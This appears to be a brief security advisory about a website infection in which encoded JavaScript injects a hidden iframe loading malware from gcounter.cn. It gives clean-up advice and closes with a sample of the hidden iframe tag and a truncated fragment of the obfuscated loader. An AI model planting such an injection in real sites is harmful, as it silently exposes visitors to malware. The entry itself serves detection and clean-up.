Description:
Javascript encoded to hide an iframe from http://gcounter.cn (and some intermediary domains, like vepifam.co.cc, etc).
This is used to load malware from external web sites while not being visible to the user.
Affecting:
Any web site
Clean up:
This malware is generally hidden on .js or .php files without heavy encoding. Searching/replacing any gcounter.cn entry should fix it.
Malware dump (sample of malware):
< iframe src = http://gcounter.cn style=display:none>
function B0B5A2EAEFDB35(F917C94BD6DC){var A9126BAF8=261;.. A9126BAF8=A9126BAF8-245;return(parseInt(F917C94BD6DC,A9126BAF8));}function F5F7FDC388(C8FAD8){var